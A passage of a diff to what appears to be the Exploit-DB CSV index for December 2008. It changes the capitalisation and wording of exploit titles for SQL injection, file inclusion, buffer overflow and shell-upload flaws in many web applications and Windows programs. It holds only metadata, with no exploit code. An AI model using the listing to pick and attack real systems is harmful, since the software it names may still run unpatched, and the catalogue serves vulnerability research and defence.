Vulnerability",2008-12-05,ViRuS_HaCkErS,php,webapps,0 7347,platforms/windows/local/7347.pl,"PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 -7348,platforms/asp/webapps/7348.txt,"Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 +7348,platforms/asp/webapps/7348.txt,"merlix educate servert (bypass/dd) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 7349,platforms/asp/webapps/7349.txt,"RankEm (rankup.asp siteID) Remote SQL Injection Vulnerability",2008-12-05,AlpHaNiX,asp,webapps,0 7350,platforms/asp/webapps/7350.txt,"RankEm (auth bypass) Remote SQL Injection Vulnerability",2008-12-05,AlpHaNiX,asp,webapps,0 -7351,platforms/php/webapps/7351.txt,"NightFall Personal Diary 1.0 (XSS/DD) Multiple Remote Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 +7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 (xss/dd) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS (cforum.mdb) Remote Database Disclosure Vulnerability",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 Insecure Upload Vulnerability",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 SITE Parameters Command Injection Vuln",2008-12-05,"Tan Chew Keong",windows,remote,0 -7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer (SQL/DD) Multiple Remote Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 +7356,platforms/asp/webapps/7356.txt,"asp autodealer (sql/dd) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL Multiple Remote SQL Injection Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx) Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability",2008-12-05,ZoRLu,asp,webapps,0 @@ -6915,31 +6915,31 @@ id,file,description,date,author,platform,type,port 7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 (natterchat112.mdb) Database Disclosure Vulnerability",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 Database Disclosure Vulnerability",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon AdManager 2.1 Remote Database Disclosure Vulnerability",2008-12-07,"Ghost Hacker",asp,webapps,0 -7373,platforms/asp/webapps/7373.txt,"ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 +7373,platforms/asp/webapps/7373.txt,"aspmanage banners (rfu/dd) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 Database Disclosure Vulnerability",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 (index.php) Directory Traversal Vulnerability",2008-12-07,zAx,php,webapps,0 -7378,platforms/asp/webapps/7378.txt,"ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 +7378,platforms/asp/webapps/7378.txt,"asp talk (sql/css) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 (filename) Remote Code Execution Vulnerability",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 Multiple Local File Inclusion Vulnerabilities",2008-12-08,DSecRG,php,webapps,0 -7381,platforms/php/webapps/7381.txt,"SIU Guarani Multiple Remote Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 +7381,platforms/php/webapps/7381.txt,"siu guarani Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (CSRF) SQL Injection Vulnerability",2008-12-08,"Michael Brooks",php,webapps,0 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 Cross Site File Upload Vulnerability",2008-12-08,"Michael Brooks",php,webapps,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (CSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection Vulnerability",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 -7388,platforms/php/webapps/7388.txt,"WebCAF <= 1.4 (LFI/RCE) Multiple Remote Vulnerabilities",2008-12-08,dun,php,webapps,0 +7388,platforms/php/webapps/7388.txt,"webcaf <= 1.4 (lfi/rce) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - (CSRF) Cross Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability",2008-12-09,AlpHaNiX,asp,webapps,0 -7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 +7392,platforms/php/webapps/7392.txt,"phpmygallery 1.0beta2 (rfi/lfi) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 7393,platforms/linux/local/7393.txt,"PHP safe_mode bypass via proc_open() and custom environment",2008-12-09,gat3way,linux,local,0 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 (index.php rubid) SQL Injection Vulnerability",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 Multiple Remote SQL Injection Vulnerabilities",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-09,Osirys,php,webapps,0 -7398,platforms/asp/webapps/7398.txt,"PostEcards (SQL/DD) Multiple Remote Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0 +7398,platforms/asp/webapps/7398.txt,"postecards (sql/dd) Multiple Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta (common-tpl-vars.php) LFI/RFI Vulnerabilities",2008-12-09,CoBRa_21,php,webapps,0 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 (LFI/XSS) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 show_error() Remote Format String PoC",2008-12-09,"Core Security",windows,dos,0 @@ -6949,11 +6949,11 @@ id,file,description,date,author,platform,type,port 7405,platforms/linux/dos/7405.c,"Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0 -7408,platforms/php/webapps/7408.txt,"Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 +7408,platforms/php/webapps/7408.txt,"living local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 7410,platforms/windows/remote/7410.htm,"MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0 -7412,platforms/asp/webapps/7412.txt,"CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 +7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction (forummessage) Blind SQL Injection Vulnerability",2008-12-10,AlpHaNiX,asp,webapps,0 7415,platforms/asp/webapps/7415.txt,"CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -6977,22 +6977,22 @@ id,file,description,date,author,platform,type,port 7433,platforms/php/webapps/7433.txt,"Social Groupie (group_index.php id) Remote SQL Injection Vulnerability",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie (create_album.php) Remote File Upload Vulnerability",2008-12-12,InjEctOr5,php,webapps,0 -7436,platforms/asp/webapps/7436.txt,"The Net Guys ASPired2Blog (SQL/DD) Multiple Remote Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 +7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog (sql/dd) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 Remote Code Execution Vulnerability",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability",2008-12-12,Dxil,asp,webapps,0 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script (id) SQL Injection Vulnerability",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations Database Disclosure Vulnerability",2008-12-12,Cyber-Zone,asp,webapps,0 -7441,platforms/php/webapps/7441.txt,"Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities",2008-12-12,jdc,php,webapps,0 +7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0 7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0 -7448,platforms/php/webapps/7448.txt,"AutositePHP 2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities",2008-12-14,SirGod,php,webapps,0 +7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 (lfi/csrf/edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 (iyziforum.mdb) Database Disclosure Vulnerability",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure Vulnerability",2008-12-14,"Ghost Hacker",asp,webapps,0 -7451,platforms/php/webapps/7451.txt,"PHP Weather 2.2.2 (LFI/XSS) Multiple Remote Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 +7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 (lfi/xss) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a (redir.php id) Remote SQL Injection Vulnerability",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit",2008-12-14,Adurit-T,linux,dos,0 @@ -7006,7 +7006,7 @@ id,file,description,date,author,platform,type,port 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 SQL Injection Vulnerability",2008-12-14,AlpHaNiX,asp,webapps,0 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 & 2.0 - SQL Injection Vulnerability",2008-12-14,AlpHaNiX,php,webapps,0 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 & 2.0 - SQL Injection Vulnerabilities",2008-12-14,AlpHaNiX,asp,webapps,0 -7465,platforms/php/webapps/7465.txt,"IsWeb CMS 3.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 +7465,platforms/php/webapps/7465.txt,"isweb cms 3.0 (sql/xss) Multiple Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability",2008-12-15,"Cold Zero",asp,webapps,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC",2008-12-15,webDEViL,multiple,dos,0 7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory (CADirectory.mdb) Database Disclosure Vuln",2008-12-15,Pouya_Server,asp,webapps,0 @@ -7026,8 +7026,8 @@ id,file,description,date,author,platform,type,port 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 Local File Inclusion / SQL Injection Vulnerabilities",2008-12-15,NoGe,php,webapps,0 7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - (right.php title) SQL Injection Vulnerability",2008-12-15,ZoRLu,php,webapps,0 7484,platforms/asp/webapps/7484.txt,"Click&BaneX Multiple Remote SQL Injection Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 -7485,platforms/asp/webapps/7485.txt,"ClickAndEmaiL (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 -7486,platforms/asp/webapps/7486.txt,"Click&Rank (SQL/XSS) Multiple Remote Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 +7485,platforms/asp/webapps/7485.txt,"clickandemail (sql/xss) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 +7486,platforms/asp/webapps/7486.txt,"click&rank (sql/xss) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload (download.php) SQL Injection Vulnerability",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 @@ -7047,15 +7047,15 @@ id,file,description,date,author,platform,type,port 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x (item) SQL Injection Vulnerability",2008-12-17,InjEctOr5,php,webapps,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability",2008-12-17,AnGeL25dZ,php,webapps,0 -7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 +7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x Arbitrary PHP File Upload Vulnerability",2008-12-18,Pouya_Server,php,webapps,0 -7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 - Stable Multiple Remote Vulnerabilities",2008-12-18,Osirys,php,webapps,0 +7510,platforms/php/webapps/7510.txt,"2532/gigs 1.2.2 - stable Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 - Stable Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 - Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling Vulnerability",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection Vulnerability",2008-12-18,boom3rang,php,webapps,0 -7515,platforms/php/webapps/7515.txt,"Phpclanwebsite <= 1.23.3 Fix Pack #5 Multiple Remote Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 +7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 (id) Remote SQL Injection Vulnerability",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability",2008-12-18,x0r,php,webapps,0 @@ -7068,8 +7068,8 @@ id,file,description,date,author,platform,type,port 7525,platforms/php/webapps/7525.txt,"Extract Website (download.php filename) File Disclosure Vulnerability",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 XSS/Database Disclosure Vulns",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability",2008-12-19,Piker,php,webapps,0 -7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 -7529,platforms/php/webapps/7529.txt,"Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities",2008-12-19,fuzion,php,webapps,0 +7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 +7529,platforms/php/webapps/7529.txt,"constructr cms <= 3.02.5 stable Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone Arbitrary File Upload Vulnerability",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas <= 2.0.4 (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 @@ -7078,14 +7078,14 @@ id,file,description,date,author,platform,type,port 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability",2008-12-21,Piker,php,webapps,0 -7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 -7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 -7540,platforms/php/webapps/7540.txt,"PHPg 1.6 (XSS/PD/DoS) Multiple Remote Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 +7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 +7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 +7540,platforms/php/webapps/7540.txt,"phpg 1.6 (xss/pd/dos) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) Remote SQL Injection Exploit",2008-12-22,Piker,php,webapps,0 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vuln",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 -7545,platforms/php/webapps/7545.txt,"YourPlace <= 1.0.2 Multiple Remote Vulnerabilities + RCE Exploit",2008-12-22,Osirys,php,webapps,0 +7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 Multiple Vulnerabilities + rce exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,Encrypt3d.M!nd,windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 @@ -7100,7 +7100,7 @@ id,file,description,date,author,platform,type,port 7557,platforms/php/webapps/7557.txt,"PHPmotion <= 2.1 CSRF Vulnerability",2008-12-23,Ausome1,php,webapps,0 7558,platforms/php/webapps/7558.txt,"phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability",2008-12-23,fuzion,php,webapps,0 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 -7560,platforms/php/webapps/7560.txt,"CMS NetCat <= 3.12 Multiple Remote Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 +7560,platforms/php/webapps/7560.txt,"cms netcat <= 3.12 Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards XSS/Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) Arbitrary File Upload Vulnerability",2008-12-23,ahmadbady,php,webapps,0 @@ -7109,7 +7109,7 @@ id,file,description,date,author,platform,type,port 7566,platforms/windows/remote/7566.html,"Google Chrome Browser (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 7567,platforms/php/webapps/7567.txt,"Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability",2008-12-23,"Hussin X",php,webapps,0 -7569,platforms/php/webapps/7569.txt,"doop CMS <= 1.4.0b (CSRF/Upload Shell) Multiple Remote Vulnerabilities",2008-12-24,x0r,php,webapps,0 +7569,platforms/php/webapps/7569.txt,"doop cms <= 1.4.0b (csrf/upload shell) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0 7570,platforms/php/webapps/7570.txt,"ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability",2008-12-24,Lidloses_Auge,php,webapps,0 7571,platforms/windows/dos/7571.txt,"BulletProof FTP Client 2.63 Local Heap Overflow PoC",2008-12-24,His0k4,windows,dos,0 7572,platforms/php/webapps/7572.txt,"Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln",2008-12-24,boom3rang,php,webapps,0 @@ -7125,9 +7125,9 @@ id,file,description,date,author,platform,type,port 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"MS Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 -7585,platforms/windows/dos/7585.txt,"MS Windows Media Player * (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffiĂ© ",windows,dos,0 +7585,platforms/windows/dos/7585.txt,"MS Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffiĂ© ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 -7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 +7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client (.bps File) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,Encrypt3d.M!nd,windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 @@ -7148,8 +7148,8 @@ id,file,description,date,author,platform,type,port 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0 7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 -7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0 -7612,platforms/php/webapps/7612.txt,"Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability",2008-12-29,"Mehmet Ince",php,webapps,0 +7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0 +7612,platforms/php/webapps/7612.txt,"Joomla Component com_na_content 1.0 - Blind SQL Injection Vulnerability",2008-12-29,"Mehmet Ince",php,webapps,0 7613,platforms/asp/webapps/7613.txt,"Sepcity Classified (classdis.asp ID) SQL Injection Vulnerability",2008-12-29,S.W.A.T.,asp,webapps,0 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 